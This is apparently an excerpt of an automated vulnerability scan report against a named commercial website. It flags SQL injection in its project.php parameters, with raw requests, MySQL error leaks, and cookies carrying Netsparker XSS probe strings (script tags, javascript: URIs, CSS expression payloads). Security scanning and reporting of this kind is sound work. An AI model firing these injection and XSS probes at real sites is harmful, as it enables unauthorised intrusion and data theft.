GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:56:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=knqeghv32pn8gronrklto0fbt4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.225. http://www.insideup.com/ppc/leadflow/deco00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:05:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=m8pnok0u4vmri3h4lprp25oaj5; path=/
Content-Length: 2222
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=iupsc'' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=iupsc'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/deco00/project.php?catId=30009&iusrc=iupsc'/'
   union select prj.catId,p' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc'' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:05:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mmdu8ap53kd6audqabelk8nid3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.226. http://www.insideup.com/ppc/leadflow/deco00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:57:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=27ocen5rmhtuc3u495m1ehnqg5; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
